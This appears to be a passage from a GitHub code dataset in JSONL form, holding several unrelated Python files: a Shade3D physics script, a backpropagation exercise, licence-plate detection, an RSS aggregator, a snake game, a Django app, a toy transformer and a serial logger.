ensure_ascii=False)\n#\n","repo_name":"ohwada/World_Countries","sub_path":"japan_municipaliy/japan_designated_city_list_coordinates/python/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30639534378","text":"# -----------------------------------------------.\n# 物理空間内の形状情報を変更.\n# f_rigidBodyType ... 剛体の種類.\n# f_softBody ... ソフトボディ時は1.\n# f_collisionType ... 衝突形状の種類.\n# f_margin ... マージン.\n# f_softBodyVolume ... ソフトボディの体積保持時は1.\n# f_softBodyKLST ... ソフトボディの硬さ.\n# f_softBodyKVC ... ソフトボディの体積を保つ.\n# f_selectIndex ... 選択された形状番号(リストボックスのインデックス)がコンマ区切りで入る.\n# return 追加された形状番号をコンマ区切りの文字列で返す.\n#\n# 要 : getCurrentPhysics.py / updateTempShapes.py\n# -----------------------------------------------.\nresult = ''\n\n# 値を数値またはtrue/falseに変換.\nerrF = False\ntry:\n f_rigidBodyType = int(f_rigidBodyType)\n f_collisionType = int(f_collisionType)\n f_margin = float(f_margin)\n f_softBodyKLST = float(f_softBodyKLST)\n f_softBodyKVC = float(f_softBodyKVC)\n if f_softBody == '1': f_softBody = True\n else: f_softBody = False\n if f_softBodyVolume == '1': f_softBodyVolume = True\n else: f_softBodyVolume = False\n\n selectIndexList = f_selectIndex.split(\",\")\n f_selectIndex = []\n for i in range(len(selectIndexList)):\n f_selectIndex.append(int(selectIndexList[i]))\n \nexcept:\n f_rigidBodyType = 0\n f_collisionType = 1\n f_softBody = False\n f_margin = 0.0\n f_softBodyKLST = 0.2\n f_softBodyKVC = 0.0\n f_softBodyVolume = False\n f_selectIndex = []\n errF = True\n\nscene = xshade.scene()\n\n# --------------------------------------------------.\n# 0番目の物理シーンの情報を更新.\n# --------------------------------------------------.\ndef updateShapes():\n global result\n\n # 追加/変更する物理形状が 剛体 <==> ソフトボディとなる場合は、.\n # physics.append_softbody_shape/physics.append_rigidbody_shapeではパラメータを変更できない.\n # そのため、一度物理シーン内の形状情報を取得してから物理シーンをクリア、そのあと再追加している.\n \n # 物理シーンの形状情報を保持.\n phyShapeList = getPhysicsShapesParam()\n if phyShapeList == None: return\n\n # 0番目の物理シーンを作成 (要 : getCurrentPhysics.py).\n phy = getCurrentPhysics()\n if phy == None: return\n \n phyShapesCou = phy.number_of_shapes\n\n # 作業用のパラメータを更新.\n mass = 1.0\n for i in range(phyShapesCou):\n if i in f_selectIndex:\n if i >= len(phyShapeList): continue\n phyShape = phy.get_shape(i)\n if f_softBody and phyShape.shape.type != 7: # ソフトボディ時にポリゴンメッシュでない場合は変更しない.\n continue\n phyData = []\n try:\n phyData.append(f_softBody)\n phyData.append(f_margin)\n phyData.append(mass)\n phyData.append(phyShape.name)\n phyData.append(phyShape.shape)\n phyData.append(phyShape.trigger_stop)\n if f_softBody:\n phyData.append(0.0)\n phyData.append(0.0)\n phyData.append(f_softBodyKLST)\n phyData.append(f_softBodyKVC)\n phyData.append(f_softBodyVolume)\n else:\n phyData.append(f_collisionType)\n phyData.append(f_rigidBodyType)\n phyShapeList[i] = phyData\n except:\n pass\n\n # 物理シーンの形状情報を更新.\n updatePhysicsShapes(phyShapeList)\n\n result = ''\n for i in range(phyShapesCou):\n if i in f_selectIndex:\n phyShape = phy.get_shape(i)\n\n # 追加された物理形状のインデックスをresultに追加.\n if phyShape != None:\n if i >= 0:\n if result != '':\n result += ','\n result += str(i)\n \n phyShape = None # 念のための解放処理. 
\n \n # 物理シーンを更新.\n phy.update()\n return\n \nif errF == False:\n updateShapes()\n","repo_name":"shade3d/physics_assistant","sub_path":"py/updateShapes.py","file_name":"updateShapes.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1799221331","text":"class MulLayer:\n def __init__(self):\n self.x = None\n self.y = None\n \n def forward(self, x, y):\n self.x = x\n self.y = y\n out = x * y\n return out\n \n def backward(self, dout):\n dx = dout * self.y #역전파에서 곱셈 노드는 x,y 값을 바꾼다.\n dy = dout * self.x\n return dx, dy\n\napple = 100\napple_num = 2\ntax = 1.1\n\n# 계층들\nmul_apple_layer = MulLayer()\nmul_tax_layer = MulLayer()\n\n# 순전파\napple_price = mul_apple_layer.forward(apple, apple_num)\nprice = mul_tax_layer.forward(apple_price, tax)\n\nprint(price) # 순전파 결과 값 : 소비세(1.1) 적용된 사과 가격\n\n# 역전파\ndprice = 1\ndapple_price, dtax = mul_tax_layer.backward(dprice)\ndapple, dapple_num = mul_apple_layer.backward(dapple_price)\n\nprint(dapple, dapple_num, dtax) # 역전파 결과 값 : 소비세가 아주 약간 오르면 가격은 얼마나 오르나?","repo_name":"NewPlus/deepLearning_from_scratch_1_practice","sub_path":"밑바닥부터 시작하는 딥러닝 예제/cp04/cp04-01(곱셈 계층).py","file_name":"cp04-01(곱셈 계층).py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73627316644","text":"from elements.yolo import CAR_DETECTION, PLATE_DETECTION, CHAR_EXTRACTION\nimport numpy as np\nimport cv2\nimport os\nfrom glob import glob\nfrom time import time\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--image', type = str, default = 'test_images/test1.jpg' , help = 'Name of the input image.')\nargs = parser.parse_args()\n\nframe = cv2.imread(args.image)\n\ncar_classes = {2: 'car', 5: 'bus', 7: 'truck'}\nplate_classes = {0: 'plate'}\nchar_classes = {0: '0', 1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', 9: '9',\n 10: 'a', 11: 'b', 12: 'p', 13: 't', 14: 'c', 15: 'j', 16: 'ch', 17: 'h', 18: 'kh', 19: 'd', 20: 'zal', 21: 'r', 22: 'z', 23: 'zh',\n 24: 's', 25: 'sh', 26: 'sad', 27: 'zad', 28: 'ta', 29: 'za', 30: 'ain', 31: 'q', 32: 'f', 33: 'qaf', 34: 'k', 35: 'g', 36: 'l', 37: 'm',\n 38: 'n', 39: 'v', 40: 'he', 41: 'y', 42: 'malool'}\n\n# detector objects\ncar_detector = CAR_DETECTION('weights/car_model.pt', car_classes)\nplate_detector = PLATE_DETECTION('weights/plate_model.pt', plate_classes)\nchar_extractor = CHAR_EXTRACTION('weights/char_model.pt', char_classes)\n\n# detection process\ncars = car_detector.detect(frame)\nplates = plate_detector.detect(frame, cars)\nchars = char_extractor.detect(frame, plates)\n\n# plotting\nfor car in cars:\n print(car)\n label = car['label']\n score = car['score']\n [(xmin,ymin),(xmax,ymax)] = car['bbox']\n frame = cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), [0,255,255] , 2) \n frame = cv2.putText(frame, f'{label} ({str(score)})', (xmin,ymin), cv2.FONT_HERSHEY_SIMPLEX , 0.75, [0,255,255], 2, cv2.LINE_AA)\n\n if car['plate_bbox'] is not None:\n [(xmin,ymin),(xmax,ymax)] = car['plate_bbox']\n frame = cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), [255,0,0] , 2) \n frame = cv2.putText(frame, 'plate', (xmin,ymin), cv2.FONT_HERSHEY_SIMPLEX , 0.75, [255,0,0], 2, cv2.LINE_AA)\n\n\ncv2.imshow('output', 
cv2.resize(frame,(1000,700)))\ncv2.waitKey()","repo_name":"NEFTeam/Traffic-Law-Enforcement","sub_path":"PlateDetection/main_plate.py","file_name":"main_plate.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"17307789382","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom os.path import abspath, realpath, split, dirname\nimport collections\nfrom datetime import datetime, timedelta\nimport time\n\nimport jinja2\nimport json\nimport logging\nimport pytz\nimport shutil\nimport sys\nimport logging\n\nfrom jinja2.exceptions import UndefinedError\nfrom .core import args\nfrom .extras import parseFeedURL, fetch_content, templateContent, process_entry\nfrom .styles import cssTextDecoded\n\nfrom .__main__ import logFile\n\n#argsFilename = args.filename\nstandardPath = os.getcwd()\n\n# Get a list of feed URLs\ntry:\n with open('feeds.txt') as f:\n SUBSCRIPTIONS = list(f)\n print('Loading feeds.txt')\nexcept FileNotFoundError: # If you don't have 'feeds.txt' in specified path, you can specify one (nfsyndication-src --filename=sample.txt)\n try:\n for documentList in args.filename:\n parent_location = os.getcwd()\n with open(documentList) as f:\n SUBSCRIPTIONS = list(f)\n print(\"Loading file: {} from '{}'\".format(documentList, os.path.join(parent_location)))\n except TypeError:\n raise Exception('NFSyndication [ERROR]: feeds.txt not found. See `nfsyndication-src --help` for more.')\n\nposts = []\noutJSONFeed= []\n\ntry:\n for url in SUBSCRIPTIONS:\n try:\n feed = parseFeedURL(url)\n blog = feed['feed']['title']\n except KeyError:\n if args.verbose and feed.bozo:\n logging.error(\"Feed data summary on URL {}\".format(url))\n logging.error(\"Failed command: {} \".format(sys.argv[0:]))\n logging.error(\"Exception [{bozo_exception}]: {bozo_message}\".format(bozo_exception=str(feed.bozo_exception.__class__.__name__), bozo_message=str(feed.bozo_exception)))\n logging.error('Response code is: {}'.format(feed.status))\n if (hasattr(feed.bozo_exception, 'getLineNumber') and hasattr(feed.bozo_exception, 'getMessage')):\n line = feed.bozo_exception.getLineNumber()\n logging.error('Line %d: %s', line, feed.bozo_exception.getMessage())\n logging.error('[NFSyndication] Writing output logs to {}'.format(os.path.join(standardPath, logFile))) \n raise Exception(f\"[{feed.bozo_exception}] (code {feed.status}) \\n{(f'Could not fetch URL(s): {url}')}\")\n sys.exit(-1)\n continue\n for entry in feed['entries']:\n post = process_entry(entry, blog, comp_field=args.comparator_filter)\n if post:\n posts.append(post)\n outJSONFeed.append(feed)\n try:\n fetch_content(url)\n except:\n raise SystemExit\nexcept NameError:\n pass\n\nif args.outputJSON:\n with open(args.outputJSON, 'w+', encoding='utf8') as outf:\n json.dump(outJSONFeed, outf, ensure_ascii=False, indent=4)\n \n \n# Get the template, and drop in the posts\ndir_path = os.path.split(os.path.realpath(__file__))[0]\n\ntry:\n with open(f'{dir_path}/templates/template.html', encoding='utf8') as f:\n print(\"\\nChecking original template file...\")\n template = jinja2.Template(f.read())\n with open(f'output/index.html', 'w', encoding='utf8') as f:\n f.write(template.render(posts=posts, time=datetime.now()))\n print('Successful.') \n with open(\"output/style.css\", 'w') as f:\n f.write(cssTextDecoded)\n\nexcept FileNotFoundError:\n template = jinja2.Template(templateContent)\n# When done, it converts to HTML\n with open(f'output/index.html', 
'w', encoding='utf8') as f:\n f.write(template.render(cssText=cssTextDecoded, posts=posts, time=datetime.now()))\n print('Successful.')\n","repo_name":"web-sys1/NFSyndication","sub_path":"NFSyndication/nfs_main.py","file_name":"nfs_main.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9146404697","text":"import os\nfrom setuptools import setup, find_packages\nimport sys\n\ntry:\n import numpy\nexcept ImportError:\n raise ImportError(\n \"Please install NumPy first, or use the Anaconda Python Distribution \"\n \"(https://store.continuum.io/cshop/anaconda/) which comes with NumPy \"\n \"installed.\"\n )\n\n\n\nversion_py = os.path.join(os.path.dirname(__file__), 'metaseq', 'version.py')\nversion = open(version_py).read().split('=')[-1].strip().replace('\"','')\n\nrequirements = open(os.path.join(os.path.dirname(__file__), 'requirements.txt')).readlines()\n\n\nlong_description = open('README.rst').read()\nsetup(\n name='metaseq',\n version=version,\n description=\"Integrative analysis of high-thoughput sequencing data\",\n #long_description=long_description,\n license=\"MIT\",\n install_requires=requirements,\n packages=find_packages(),\n package_data={\n 'metaseq':[\n 'test/data/gdc*',\n 'test/data/make_examples_from_pybedtools.py',\n 'test/data/x.*',\n ]\n },\n scripts=[\n 'metaseq/scripts/download_metaseq_example_data.py',\n 'metaseq/scripts/metaseq-cli',\n 'metaseq/scripts/speedtest.py',\n ],\n author='Ryan Dale',\n author_email='dalerr@niddk.nih.gov',\n url='http://github.com/daler/metaseq',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Operating System :: POSIX',\n 'Operating System :: MacOS :: MacOS X',\n 'Environment :: Console',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'Topic :: Scientific/Engineering :: Medical Science Apps.', \n ]\n )\n","repo_name":"daler/metaseq","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"52"} +{"seq_id":"72429581924","text":"import pygame\nimport time\nimport random\nimport sys\n\npygame.init()\n\n# Cargar el sonido de la manzana\neat_sound = pygame.mixer.Sound(\"hackaton23/snake_game/1.mp3\")\nmagic_potion_sound = pygame.mixer.Sound(\"hackaton23/snake_game/2.mp3\")\n\n\n# Definir colores\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\nred = (213, 50, 80)\nblue = (50, 153, 213)\ngreen = (0, 255, 0)\n\n# Definir el tamaño de la pantalla\ndis_width = 600\ndis_height = 400\n\ndis = pygame.display.set_mode((dis_width, dis_height))\npygame.display.set_caption('Snake Game by ProGit')\n\n# Definir la velocidad del juego\nsnake_block = 10\nsnake_speed = 8\n\n# Definir la fuente y el tamaño del texto\nfont_style = pygame.font.SysFont(None, 25)\n\n# Función para dibujar la serpiente en la pantalla\ndef our_snake(snake_block, snake_list):\n for x in snake_list:\n pygame.draw.rect(dis, white, [x[0], x[1], snake_block, snake_block])\n\n# Función para mostrar el puntaje en la pantalla\ndef Your_score(score):\n value = font_style.render(\"Tus punticos: \" + str(score), True, blue)\n dis.blit(value, [0, 0])\n\n# Función para mostrar el mensaje de derrota\ndef message(msg, color):\n mesg = font_style.render(msg, True, color)\n dis.blit(mesg, 
[dis_width / 6, dis_height / 3])\n\n# Función principal del juego\ndef gameLoop():\n game_over = False\n game_close = False\n\n # Inicializar la posición de la serpiente\n x1 = dis_width / 2\n y1 = dis_height / 2\n\n # Inicializar el cambio en la posición de la serpiente\n x1_change = 0\n y1_change = 0\n\n # Inicializar la longitud de la serpiente\n snake_List = []\n Length_of_snake = 1\n\n # Inicializar la posición de la comida\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n potionx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n potiony = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n\n while not game_over:\n\n while game_close:\n dis.fill(black)\n message(\"¡Perdiste! Presiona C para jugar otra vez o Q para salir\", red)\n Your_score(Length_of_snake - 1)\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n game_over = True\n game_close = False\n if event.key == pygame.K_c:\n gameLoop()\n elif event.type == pygame.QUIT:\n game_over = True\n game_close = False\n pygame.quit()\n sys.exit()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT and x1_change == 0:\n x1_change = -snake_block\n y1_change = 0\n elif event.key == pygame.K_RIGHT and x1_change == 0:\n x1_change = snake_block\n y1_change = 0\n elif event.key == pygame.K_UP and y1_change == 0:\n y1_change = -snake_block\n x1_change = 0\n elif event.key == pygame.K_DOWN and y1_change == 0:\n y1_change = snake_block\n x1_change = 0\n elif event.key == pygame.K_ESCAPE:\n game_close = True\n\n # Actualizar la posición de la serpiente\n x1 += x1_change\n y1 += y1_change\n\n # Verificar si la serpiente choca con ella misma\n for segment in snake_List[:-1]:\n if segment == [x1, y1]:\n game_close = True\n\n # Verificar si la serpiente sale de la pantalla\n if x1 >= dis_width or x1 < 0 or y1 >= dis_height or y1 < 0:\n game_close = True\n\n dis.fill(black)\n pygame.draw.rect(dis, red, [foodx, foody, snake_block, snake_block])\n pygame.draw.rect(dis, green, [potionx, potiony, snake_block, snake_block]) # Dibuja la poción mágica\n\n\n\n snake_head = [x1, y1]\n snake_List.append(snake_head)\n\n # Limitar la longitud de la serpiente\n if len(snake_List) > Length_of_snake:\n del snake_List[0]\n\n our_snake(snake_block, snake_List)\n Your_score(Length_of_snake - 1)\n\n pygame.display.update()\n\n # Generar una nueva posición para la comida cuando la serpiente la come\n if x1 == foodx and y1 == foody:\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake += 1\n\n # Reproducir el sonido de la manzana\n eat_sound.play()\n\n if x1 == potionx and y1 == potiony:\n potionx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n potiony = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake -= 1 # Restar 1 a la longitud de la serpiente\n\n magic_potion_sound.play()\n\n\n # Ajustar la velocidad de la serpiente en función de su longitud\n snake_speed = 8 + Length_of_snake * 1.2\n\n pygame.time.Clock().tick(snake_speed)\n\n pygame.quit()\n 
sys.exit()\n\ngameLoop()","repo_name":"Marcos20292004/snake_game","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72457312166","text":"from os import error\nfrom django.http import request\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import EmployeeCreation\nfrom django.contrib import messages\nfrom .models import Employee, Supervisor, Log\nimport openpyxl\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nimport pandas as pd\nfrom task.tasks import upload_task\nfrom task.tasks import message_\n\n\n@login_required\ndef home(request):\n employees = reversed(Employee.objects.all())\n context = {\"employees\": employees}\n return render(request, \"base/index.html\", context)\n\n\n@login_required\ndef log(request):\n logs = reversed(Log.objects.all())\n context = {\"logs\": logs}\n return render(request, \"base/logs.html\", context)\n\n\ndef user_login(request):\n if request.method == \"POST\":\n username = request.POST.get(\"username\", \"\")\n password = request.POST.get(\"password\", \"\")\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user=user)\n return redirect(\"home\")\n else:\n return render(request, \"base/login.html\")\n return render(request, \"base/login.html\")\n\n\n@login_required\ndef employee_creation(request):\n if request.method == \"POST\":\n form = EmployeeCreation(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, \"Employee added successfully\")\n return redirect(\"home\")\n else:\n messages.error(request, \"Please check input\")\n form = EmployeeCreation()\n return render(request, \"base/create_employee.html\", {\"form\": form})\n else:\n form = EmployeeCreation()\n return render(request, \"base/create_employee.html\", {\"form\": form})\n\n\n@login_required\ndef upload_data(request):\n if request.method == \"POST\":\n try:\n file_ = request.FILES[\"file\"]\n except Exception as e:\n file_ = \"\"\n filename = str(file_)\n ext = filename.split(\".\")[-1]\n\n print(ext)\n if ext == \"xlsx\":\n upload_task(file_)\n return redirect(\"home\")\n elif ext == \"\":\n messages.error(request, \"Please choose a file\")\n else:\n messages.error(\n request, \"Please upload an Excel file with '.xlsx' extension\"\n )\n return redirect(\"upload_data\")\n return render(request, \"base/upload.html\")\n","repo_name":"fennin3/employee-data-collection-app","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2226721511","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n# Hyperparameter\nvocab_size = 10000\nd_model = 512\nn_heads = 8\ndim_feedforward = 2048\nnum_layers = 6\nnum_epochs = 10\nlearning_rate = 0.001\n\n# Token Embedding\nclass TokenEmbedding(nn.Module):\n def __init__(self, vocab_size, d_model):\n super(TokenEmbedding, self).__init__()\n self.embedding = nn.Embedding(vocab_size, d_model)\n self.d_model = d_model\n\n def forward(self, x):\n return self.embedding(x) * torch.sqrt(torch.tensor(self.d_model, dtype=torch.float32))\n\n# Positional Encoding\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model):\n super(PositionalEncoding, 
self).__init__()\n        self.d_model = d_model\n        self.dropout = nn.Dropout(0.1)\n        pe = torch.zeros(1000, d_model)\n        position = torch.arange(0, 1000, dtype=torch.float32).unsqueeze(1)\n        div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-torch.log(torch.tensor(10000.0)) / d_model))\n        pe[:, 0::2] = torch.sin(position * div_term)\n        pe[:, 1::2] = torch.cos(position * div_term)\n        self.register_buffer('pe', pe)\n\n    def forward(self, x):\n        # index the table by sequence length, not batch size\n        x = x + self.pe[:x.size(1), :]\n        return self.dropout(x)\n\n# Self-Attention Layer\nclass SelfAttention(nn.Module):\n    def __init__(self, d_model, n_heads):\n        super(SelfAttention, self).__init__()\n        self.d_model = d_model\n        self.n_heads = n_heads\n        self.head_dim = d_model // n_heads\n        self.q_linear = nn.Linear(d_model, d_model)\n        self.k_linear = nn.Linear(d_model, d_model)\n        self.v_linear = nn.Linear(d_model, d_model)\n        self.out_linear = nn.Linear(d_model, d_model)\n\n    def forward(self, x):\n        q = self.q_linear(x)\n        k = self.k_linear(x)\n        v = self.v_linear(x)\n        q = self.split_heads(q)\n        k = self.split_heads(k)\n        v = self.split_heads(v)\n        scaled_attention, attention_weights = self.scaled_dot_product_attention(q, k, v)\n        scaled_attention = self.combine_heads(scaled_attention)\n        output = self.out_linear(scaled_attention)\n        return output\n\n    def split_heads(self, x):\n        batch_size, seq_length, _ = x.size()\n        x = x.view(batch_size, seq_length, self.n_heads, self.head_dim)\n        return x.permute(0, 2, 1, 3)\n\n    def scaled_dot_product_attention(self, q, k, v):\n        matmul_qk = torch.matmul(q, k.permute(0, 1, 3, 2))\n        scaled_attention_logits = matmul_qk / torch.sqrt(torch.tensor(self.head_dim, dtype=torch.float32))\n        attention_weights = nn.Softmax(dim=-1)(scaled_attention_logits)\n        output = torch.matmul(attention_weights, v)\n        return output, attention_weights\n\n    def combine_heads(self, x):\n        batch_size, _, seq_length, _ = x.size()\n        x = x.permute(0, 2, 1, 3).contiguous()\n        return x.view(batch_size, seq_length, self.d_model)\n\n# Feedforward Layer\nclass FeedForward(nn.Module):\n    def __init__(self, d_model, dim_feedforward):\n        super(FeedForward, self).__init__()\n        self.linear1 = nn.Linear(d_model, dim_feedforward)\n        self.linear2 = nn.Linear(dim_feedforward, d_model)\n        self.relu = nn.ReLU()\n\n    def forward(self, x):\n        x = self.relu(self.linear1(x))\n        x = self.linear2(x)\n        return x\n\n# Transformer Block\nclass TransformerBlock(nn.Module):\n    def __init__(self, d_model, n_heads, dim_feedforward):\n        super(TransformerBlock, self).__init__()\n        self.self_attention = SelfAttention(d_model, n_heads)\n        self.feedforward = FeedForward(d_model, dim_feedforward)\n        self.norm1 = nn.LayerNorm(d_model)\n        self.norm2 = nn.LayerNorm(d_model)\n\n    def forward(self, x):\n        attention_output = self.self_attention(x)\n        x = x + attention_output\n        x = self.norm1(x)\n        feedforward_output = self.feedforward(x)\n        x = x + feedforward_output\n        x = self.norm2(x)\n        return x\n\n# Transformer Model\nclass Transformer(nn.Module):\n    def __init__(self, vocab_size, d_model, n_heads, dim_feedforward, num_layers):\n        super(Transformer, self).__init__()\n        self.token_embedding = TokenEmbedding(vocab_size, d_model)\n        self.positional_encoding = PositionalEncoding(d_model)\n        self.transformer_blocks = nn.ModuleList(\n            [TransformerBlock(d_model, n_heads, dim_feedforward) for _ in range(num_layers)]\n        )\n        self.fc = nn.Linear(d_model, vocab_size)\n\n    def forward(self, x):\n        x = self.token_embedding(x)\n        x = self.positional_encoding(x)\n        for transformer_block in self.transformer_blocks:\n            x = transformer_block(x)\n        x = self.fc(x)\n        return x\n\n# 
Training data\ntext = \"This is an example text.\"\ntokens = text.split()\n\n# Build the vocabulary\nvocab = list(set(tokens))\nvocab_size = len(vocab)\nword2idx = {word: idx for idx, word in enumerate(vocab)}\nidx2word = {idx: word for idx, word in enumerate(vocab)}\n\n# Tokenization\ntoken_ids = [word2idx[word] for word in tokens]\n\n# Initialize the model\nmodel = Transformer(vocab_size, d_model, n_heads, dim_feedforward, num_layers)\n\n# Loss function and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n# Training loop\nfor epoch in range(num_epochs):\n    optimizer.zero_grad()\n    inputs = torch.tensor(token_ids[:-1], dtype=torch.long)\n    targets = torch.tensor(token_ids[1:], dtype=torch.long)\n    outputs = model(inputs.unsqueeze(0))\n    loss = criterion(outputs.squeeze(0), targets)\n    loss.backward()\n    optimizer.step()\n    print(f\"Epoch: {epoch+1}, Loss: {loss.item()}\")\n\n# Example generation\ninput_ids = torch.tensor(token_ids[:-1], dtype=torch.long)\ngenerated_ids = model(input_ids.unsqueeze(0)).argmax(dim=-1)\ngenerated_text = [idx2word[idx.item()] for idx in generated_ids.squeeze()]\nprint(\"Generated Text:\", \" \".join(generated_text))\n","repo_name":"Goku-bot/My-Own-Smarthome-AI","sub_path":"Conversational/train-conv-v1.py","file_name":"train-conv-v1.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26712847314","text":"import serial\nimport serial.tools.list_ports as lst\nimport time\n\nlogFile = open('/home/filippo/Desktop/logFile_1.txt', 'w')\n\ninfo = lst.comports()\n\nser = serial.Serial()\n\ndef find_Stm():\n    for port in info:\n        if(port.product.find(\"STM32\") != -1):\n            return port.device\n    return 0\n\ndef open_device(dev):\n    ser.port = dev\n    ser.baudrate = 2250000\n    ser.open()\n    ser.readline()\n\n\ndef parse_message(msg):\n    msg = msg.decode('utf-8')\n    msg = msg.split(\"\\t\")[1:]\n    msg = \"\\t\".join(msg)\n    return msg\n\n\nif __name__ == \"__main__\":\n    if find_Stm() == 0:\n        print(\"no STM32 Detected, Exit_Program\")\n        exit(0)\n\n    open_device(find_Stm())\n\n\n    while True:\n        try:\n            msg = ser.readline()\n            msg = parse_message(msg)\n            msg = str(time.time()) + \"\\t\" + msg\n            logFile.write(msg)\n        except KeyboardInterrupt:\n            logFile.close()\n            exit(0)\n\n    \n","repo_name":"mattebit/chimera-sensors","sub_path":"Tools/CAN_logger.py","file_name":"CAN_logger.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33605668171","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr  6 18:16:36 2020\n\n@author: yulli\n\"\"\"\nimport src.utils.constants as cns\nfrom src.collect.tweet import Tweet\nfrom src.utils.files import write_list\nfrom src.utils.files import read_sample\nfrom src.utils.effects import progress_bar\nimport random\nimport glob\nimport argparse\n\n\ndef generate(source_dir, target_file, n_items, list_to_ignore):\n    random.seed(cns.SEED)\n    tweets = glob.glob(source_dir + '*.json')\n    sample = []\n    progress_bar(0, n_items)\n    count_items = 0\n    while count_items < n_items and len(tweets) != 0:\n        choosed = tweets[random.randint(0, len(tweets)-1)]\n        tweet = Tweet(choosed)\n        if not tweet.is_retweet() and tweet.id() not in list_to_ignore:\n            sample.append(tweet.id())\n            count_items += 1\n            progress_bar(count_items, n_items)\n\n        tweets.remove(choosed)\n    write_list(target_file, sample)\n    if 
len(sample) != n_items:\n print(f\"Couldn't generate a sample with {n_items} items. \"\n f\"A sample with {len(sample)} was generated.\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Create datasets.\")\n parser.add_argument('-v', '--valid_sample', action='store_true',\n help=\"Generate real datasets\")\n args = parser.parse_args()\n\n if args.valid_sample:\n print(\"Generate preprocess sample ...\")\n ignore_tweets = read_sample(cns.UNLABLED_SAMPLE)\n generate(cns.PATH_STOPWORDS, cns.PREPROCESS_SAMPLE, 10**5,\n ignore_tweets)\n else:\n s_dir = cns.ROOT_DATA + 'temp/jsons/'\n generate(s_dir, cns.ROOT_DATA + 'temp/sample-test.txt', 10,\n ['1129184408106201088', '1127340537021964288'])\n","repo_name":"yullidias/AutomaticIronyDetection","sub_path":"src/generate_sample.py","file_name":"generate_sample.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20014238910","text":"# Constructor\n\n# Creating class -> Employee()\nclass Employee():\n\n # Creating constructor\n def __init__(self, name, salary, department):\n self.name = name # this is attribute\n self.salary = salary # this is attribute\n self.department = department # this is attribute\n\n def showData(self):\n print(\"name = {} \".format(self.name)) # Another way to do it\n print(\"Salary = {} \".format(self.salary)) # Another way to do it\n print(\"Department = {} \".format(self.department)) # Another way to do it\n\n\n# creating object -> obj1\n\n# First object\nobj1 = Employee(\"John\", 5000, \"IT\" )\nobj1.showData()\nobj1.salary = 7000 # modifying value in class\nobj1.name = \"John Doe\" # new value in parameter of name\nobj1.department = \"Manager\" # new value in parameter of department\n\nobj1.showData()\n\n# Second Object\nobj2 = Employee(\"Sara\", 4000, \"Accounting\" )\nobj2.showData()\nobj2.name = \"Sara Smith\"\nobj2.department = \"Developer\"\nobj2.showData()\n\n# Third Object\nobj3 = Employee(\"Tommy\", 3000, \"Designer\" )\n\n# obj2.showData()\n# 